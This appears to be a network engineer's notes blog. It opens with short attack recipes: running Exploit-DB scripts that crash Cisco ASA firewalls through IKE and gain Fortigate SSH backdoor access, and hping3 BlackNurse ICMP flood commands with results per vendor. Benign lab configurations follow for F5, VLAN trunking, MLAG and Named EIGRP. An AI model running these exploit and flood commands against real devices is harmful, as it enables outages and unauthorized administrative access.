Cisco ASA Software 8.x / 9.x – IKEv1 and IKEv2 Buffer Overflow

SOURCE:
RESULT:
-crashed ASA and force it to reboot

AFFECTED DEVICE:
Buffer overflow in the IKEv1 and IKEv2 implementations in
-Cisco ASA Software before 8.4(7.30), 8.7 before 8.7(1.18), 9.0 before 9.0(4.38), 9.1 before 9.1(7), 9.2 before 9.2(4.5), 9.3 before 9.3(3.7), 9.4 before 9.4(2.4), and 9.5 before 9.5(2.2) on ASA 5500 devices, ASA 5500-X devices
-ASA Services Module for Cisco Catalyst 6500 and Cisco 7600 devices, ASA 1000V devices
-Adaptive Security Virtual Appliance (aka ASAv), Firepower 9300 ASA Security Module, and ISA 3000

VERIFICATION:
-find open port using kali linux
# nmap -v -A 10.0.10.221
opened ports are 22 and 443

-download python script from https://www.exploit-db.com/exploits/39823/
# python 39823.py 10.0.10.221 10.0.10.103:443
10.0.10.103 is my pc ip
443 is port that we want to attack, we can use port 22 instead

Firewall/Router Attack – BlackNurse

SOURCE: blacknurse.dk

This BlackNurse attack will causing high CPU on target device

REQUIREMENT:

-Kali linux

Attack (flood better)
# hping3 -1 -C 3 -K 3 -i u20

# hping3 -1 -C 3 -K 3 –flood

RESULTS:
-Mikrotik v6.37.1 CPU utilization before attack 4%, after attack 44%
-Fortigate 5.2 CPU utilization before attack idle 99%, after attack idle 70%

This attack only from 1 source. Could be more damage if I am using more attack sources

LIST OF REPORTED AFFECTED PRODUCTS :
-Cisco ASA 5505, 5506, 5515, 5525 , 5540 (default settings)
-Cisco 6500 routers with SUP2T and Netflow v9 on the inbound interface – 100% CPU load
-Cisco ASA 5550 (Legacy) and 5515-X (latest generation)
-Cisco Router 897 – Can be mitigated – The current code from https://www.cymru.com/Documents/secure-ios-template.html will make evil worse.
-Fortinet v5.4.1 – One CPU consumed
-Fortigate units 60c and 100D (even with drop ICMP on) – RESPONSE FROM FORTINET
-Some unverified Palo Alto – SEE ANSWER FROM PALO ALTO
-Palo Alto 5050 Firewalls with firmware 7.1.4-h2
-SonicWall – Misconfiguration can be changed and mitigated (Enable Anti-DDOS)
-Zyxel NWA3560-N (Wireless attack from LAN Side)

-Zyxel Zywall USG50

NOT AFFECTED:
-AVM Fritz!Box 7360 (common ADSl router in Germany)
-Check Point Security Gateways – Checkpoint response!
-Cisco ISR4321 Router IOS XE – Version 15.5(3)S2, RELEASE SOFTWARE (fc2)
-GigaVUE HC-Serie (Gigamon)
-Iptables
-Juniper SRX
-Mikrotik CCR1036-12G-4S firmware: 3.27 (250 Mbit/sek) and no problem && RouterOS 5.4 on Mikrotik RB750
-OpenBSD 6.0 and current
-pfSense
-Ubiquiti Networks – EdgeRouter Lite CPU 60-70% load but still going
-Windows Firewalls

Fortigate OS 4.x < 5.0.7 – SSH Backdoor

SOURCE: https://www.exploit-db.com/exploits/39224/

This remote exploit which allows remote attackers to obtain administrative access via an SSH session

Affected device:
-FortiAnalyzer before 5.0.12 and 5.2.x before 5.2.5
-FortiSwitch 3.3.x before 3.3.3; FortiCache 3.0.x before 3.0.8
-FortiOS 4.1.x before 4.1.11, 4.2.x before 4.2.16, 4.3.x before 4.3.17 and 5.0.x before 5.0.8

# mv 39224.py fgt_ssh_backdoor.py
# chmod 744 fgt_ssh_backdoor.py
# ./fgt_ssh_backdoor.py targetip

INOPERATIVE in Bash F5

SOURCE:
The Configuration utility indicates that the BIG-IP system is in the online (active) state, but the command line shows the inoperative status.
For example:
[root@bigip:INOPERATIVE:Standalone] config #

Workaround
To avoid this issue, you can configure BIG-IP VE with a VLAN that has the appropriate network interface attached. For more information, refer to SOL14961: Create and modify VLANs using the tmsh utility.
root@(bigip1)(cfg-sync Standalone)(INOPERATIVE)(/Common)(tmos)# create net vlan EXT interfaces add { 1.1 }
root@(bigip1)(cfg-sync Standalone)(Active)(/Common)(tmos)# create net vlan INT interfaces add { 1.2 }

Trunk between 3 switches

Image.png

Let say you have vlan10 in SW1 and SW3. Both switches have VTP in transparent mode.
Now between SW1 and SW3, we add SW2 with transparent vtp too.
We need to add all vlans that reside on SW1 and SW3 into SW2.
Even if those vlans not being used in any ports in SW2
NOTE:
-“vlan 10” in SW2 is important, without it I can’t ping PC2 from PC1

PC1
hostname PC1
interface Ethernet0/0
ip address 10.10.10.1 255.255.255.0

SW1
hostname SW1
vtp domain POC
vtp mode transparent
vlan 10
interface Ethernet0/0
switchport access vlan 10
switchport mode access
interface Ethernet0/2
switchport trunk encapsulation dot1q
switchport mode trunk

SW2
hostname SW2
vtp domain POC
vtp mode transparent
vlan 10
interface Ethernet0/2
switchport trunk encapsulation dot1q
switchport mode trunk
interface Ethernet0/3
switchport trunk encapsulation dot1q
switchport mode trunk

SW3
hostname SW3
vtp domain POC
vtp mode transparent
vlan 10
interface Ethernet0/0
switchport access vlan 10
switchport mode access
interface Ethernet0/3
switchport trunk encapsulation dot1q
switchport mode trunk

PC2
hostname PC2
interface Ethernet0/0
ip address 10.10.10.2 255.255.255.0

Multi-Chassis Link Aggregation (MLAG)

SOURCE:
Image.png
SW1
hostname SW1
vlan 30
vlan 4094
  trunk group mlagpeer
interface Port-Channel3
  switchport mode trunk
  mlag 3
interface Port-Channel4
  switchport mode trunk
  mlag 4
interface Port-Channel10
  switchport mode trunk
  switchport trunk group mlagpeer
interface Ethernet1
  channel-group 10 mode active
interface Ethernet2
  channel-group 10 mode active
interface Ethernet3
  channel-group 3 mode active
interface Ethernet4
  channel-group 4 mode active
interface Vlan4094
  no autostate
  ip address 12.0.0.1/30
mlag configuration
  domain-id mlag1
  local-interface Vlan4094
  peer-address 12.0.0.2
  peer-link Port-Channel10
end
wr

SW2
hostname SW2
vlan 30
vlan 4094
  trunk group mlagpeer
interface Port-Channel3
  switchport mode trunk
  mlag 3
interface Port-Channel4
  switchport mode trunk
  mlag 4
interface Port-Channel10
  switchport mode trunk
  switchport trunk group mlagpeer
interface Ethernet1
  channel-group 10 mode active
interface Ethernet2
  channel-group 10 mode active
interface Ethernet3
  channel-group 3 mode active
interface Ethernet4
  channel-group 4 mode active
interface Vlan4094
  no autostate
  ip address 12.0.0.2/30
mlag configuration
  domain-id mlag1
  local-interface Vlan4094
  peer-address 12.0.0.1
  peer-link Port-Channel10
end
wr

SW3
hostname SW3
no spanning-tree vlan 4094
vlan 30
interface Port-Channel3
  switchport mode trunk
interface Ethernet1
  switchport access vlan 30
interface Ethernet3
  channel-group 3 mode active
interface Ethernet4
  channel-group 3 mode active
end
wr

SW4
hostname SW4
no spanning-tree vlan 4094
vlan 30
interface Port-Channel4
  switchport mode trunk
interface Ethernet1
  switchport access vlan 30
interface Ethernet3
  channel-group 4 mode active
interface Ethernet4
  channel-group 4 mode active
end
wr

VERIFICATION
SW1#sh mlag
MLAG Configuration:
domain-id           :               mlag1
local-interface     :            Vlan4094
peer-address        :            12.0.0.2
peer-link           :      Port-Channel10
peer-config         :          consistent
MLAG Status:
state               :              Active
negotiation status  :           Connected
peer-link status    :                  Up
local-int status    :                  Up
system-id           :   52:00:00:cb:38:c2
MLAG Ports:
Disabled            :                   0
Configured          :                   0
Inactive            :                   0
Active-partial      :                   0
Active-full         :                   2

SW1# sh mlag interfaces detail
                                        local/remote
 mlag         state   local   remote    oper    config    last change   changes
—— ————- ——- ——– ——- ———- ————– ——-
    3   active-full     Po3      Po3   up/up   ena/ena    0:13:09 ago         4
    4   active-full     Po4      Po4   up/up   ena/ena    0:13:09 ago         4

SW1#sh lacp sys-id detailed
System Identifier used by LACP:
System priority: 32768
Switch MAC Address: 50:00:00:d7:ee:0b
  802.11.43 representation: 8000,50-00-00-d7-ee-0b
MLAG System-identifier: 52:00:00:cb:38:c2
  802.11.43 representation: 8000,52-00-00-cb-38-c2

SW2#sh mlag
MLAG Configuration:
domain-id           :               mlag1
local-interface     :            Vlan4094
peer-address        :            12.0.0.1
peer-link           :      Port-Channel10
peer-config         :          consistent
MLAG Status:
state               :              Active
negotiation status  :           Connected
peer-link status    :                  Up
local-int status    :                  Up
system-id           :   52:00:00:cb:38:c2
MLAG Ports:
Disabled            :                   0
Configured          :                   0
Inactive            :                   0
Active-partial      :                   0
Active-full         :                   2

SW2#sh mlag interfaces detail
                                        local/remote
 mlag         state   local   remote    oper    config    last change   changes
—— ————- ——- ——– ——- ———- ————– ——-
    3   active-full     Po3      Po3   up/up   ena/ena    0:14:28 ago         4
    4   active-full     Po4      Po4   up/up   ena/ena    0:14:28 ago         4

SW2#sh lacp sys-id detailed
System Identifier used by LACP:
System priority: 32768
Switch MAC Address: 50:00:00:cb:38:c2
  802.11.43 representation: 8000,50-00-00-cb-38-c2
MLAG System-identifier: 52:00:00:cb:38:c2
  802.11.43 representation: 8000,52-00-00-cb-38-c2

SW2#sh etherchannel detailed
Port Channel Port-Channel3 (Fallback State: Unconfigured):
  Active Ports:
       Port                Time became active       Protocol    Mode
    ——————- ———————— ————– ——
       Ethernet3           16:59:15                 LACP        Active
       PeerEthernet3       16:59:16                 LACP        Active
Port Channel Port-Channel4 (Fallback State: Unconfigured):
  Active Ports:
       Port                Time became active       Protocol    Mode
    ——————- ———————— ————– ——
       Ethernet4           16:59:15                 LACP        Active
       PeerEthernet4       16:59:16                 LACP        Active
Port Channel Port-Channel10 (Fallback State: Unconfigured):
  Active Ports:
       Port            Time became active       Protocol    Mode
    ————— ———————— ————– ——
       Ethernet1       16:59:06                 LACP        Active
       Ethernet2       16:59:06                 LACP        Active

Named EIGRP

SOURCE:
Since IOS ver 15.2 Cisco support Named EIGRP.

Named EIGRP is Cisco’s attempt to improve the way you configure EIGRP. With Named EIGRP, all of the EIGRP routing process parameters reside in a single, hierarchical section of the running configuration. No longer are EIGRP commands scattered throughout the running configuration. Named EIGRP also provides consistency between the IPv4 and IPv6 EIGRP commands and their parameters.

With this Named mode, we can create a single Instance of EIGRP, which can be used for all address family type as shown above.

Another simplicity is if want to turn off the entire AS, you can use “shutdown” command under address-family to turn off the entire instance.
R1(config)#router eigrp HQ1
R1(config-router)#shutdown

Named EIGRP has 3 configuration modes. These are:
  1) address-family configuration mode – (config-router-af)#
  2) address-family interface configuration mode – (config-router-af-interface)#

  3) address-family topology configuration mode – (config-router-af-topology)#

A) Address-family configuration mode:
In this mode, you can configure networks, EIGRP neighbor, EIGRP Router-id, metric etc. From this mode you can access the other two configuration modes used in EIGRP named configuration.
R2(config-router)#address-family ipv4 unicast autonomous-system 1
R2(config-router-af)#?
Address Family configuration commands:
  af-interface            Enter Address Family interface configuration
  default                   Set a command to its defaults
  eigrp                     EIGRP Address Family specific commands
  exit-address-family Exit Address Family configuration mode
  help                      Description of the interactive help system
  maximum-prefix     Maximum number of prefixes acceptable in aggregate
  metric                   Modify metrics and parameters for address advertisement
  neighbor               Specify an IPv4 neighbor router
  network                Enable routing on an IP network
  no                        Negate a command or set its defaults
  shutdown              Shutdown address family
  timers                   Adjust peering based timers

  topology               Topology configuration mode

B) Address-family interface configuration mode:

This mode takes all the interface specific commands that were previously configured on an actual interface (logical or physical) and moves them into the EIGRP configuration. EIGRP authentication, Bandwidth-percentage, split-horizon, and summary-address configuration are some of the options that are now configured here instead of in interface configuration mode.

R2(config-router-af)#af-interface fa0/0
R2(config-router-af-interface)#?
Address Family Interfaces configuration commands:
authentication           authentication subcommands
bandwidth-percent    Set percentage of bandwidth percentage limit
bfd                          Enable Bidirectional Forwarding Detection
dampening-change   Percent interface metric must change to cause update
dampening-interval   Time in seconds to check interface metrics
default                    Set a command to its defaults
exit-af-interface       Exit from Address Family Interface configuration mode
hello-interval           Configures hello interval
hold-time                Configures hold time
next-hop-self           Configures EIGRP next-hop-self
no                          Negate a command or set its defaults
passive-interface     Suppress address updates on an interface
shutdown                Disable Address-Family on interface
split-horizon            Perform split horizon
summary-address    Perform address summarization

In traditional way if we want run EIGRP on all interface we use “network 0.0.0.0 0.0.0.0” command. Here you can use “af-interface default” to function same.
R2(config-router-af)#af-interface default

R2(config-router-af-interface)#

C) Address-family topology configuration mode:
This mode provide several options which operates on EIGRP topology table .here you can define content like redistribution, distance, offset list, variance etc. To enter this mode, we need to go back to address-family configuration mode:
R2(config-router-af-interface)#exit
R2(config-router-af)#topology base
R2(config-router-af-topology)#?
Address Family Topology configuration commands:
  auto-summary        Enable automatic network number summarization
  default                   Set a command to its defaults
  default-information  Control distribution of default information
  default-metric         Set metric of redistributed routes
  distance                 Define an administrative distance
  distribute-list          Filter entries in eigrp updates
  eigrp                     EIGRP specific commands
  exit-af-topology      Exit from Address Family Topology configuration mode
  fast-reroute           Configure Fast-Reroute
  maximum-paths     Forward packets over multiple paths
  metric                   Modify metrics and parameters for advertisement
  no                        Negate a command or set its defaults
  offset-list              Add or subtract offset from EIGRP metrics
  redistribute           Redistribute IPv4 routes from another routing protocol
  snmp                    Modify snmp parameters
  summary-metric    Specify summary to apply metric/filtering
  timers                   Adjust topology specific timers
  traffic-share          How to compute traffic share over alternate paths

  variance                Control load balancing variance

 Image.png
PC1:
hostname PC1
interface Ethernet0/0
 ip address 12.0.0.11 255.255.255.0

ip route 0.0.0.0 0.0.0.0 12.0.0.1

R1:
hostname R1
key chain MYCHAIN
 key 1
  key-string c1$c0
interface Loopback0
 ip address 1.0.0.1 255.255.255.255
interface Ethernet0/0
 ip address 23.0.0.1 255.255.255.0
interface Ethernet0/1
 ip address 12.0.0.1 255.255.255.0
router eigrp HQ1
 address-family ipv4 unicast autonomous-system 1
  af-interface Ethernet0/0
   authentication key-chain MYCHAIN
  exit-af-interface
  topology base
   redistribute static
  exit-af-topology
  network 1.0.0.0
  network 12.0.0.0
  network 23.0.0.0

 exit-address-family

R2:
hostname R2
key chain MYCHAIN
 key 1
  key-string c1$c0
interface Loopback0
 ip address 1.0.0.2 255.255.255.255
interface Ethernet0/0
 ip address 23.0.0.2 255.255.255.0
interface Ethernet0/1
 ip address 34.0.0.1 255.255.255.0
router eigrp HQ1
 address-family ipv4 unicast autonomous-system 1
  af-interface Ethernet0/0
   authentication key-chain MYCHAIN
  exit-af-interface
  topology base
   redistribute static
  exit-af-topology
  network 1.0.0.0
  network 23.0.0.0
  network 34.0.0.0

 exit-address-family

PC2:
hostname PC2
interface Ethernet0/0
 ip address 34.0.0.11 255.255.255.0
ip route 0.0.0.0 0.0.0.0 34.0.0.1
VERIFICATION
PC1#ping 34.0.0.11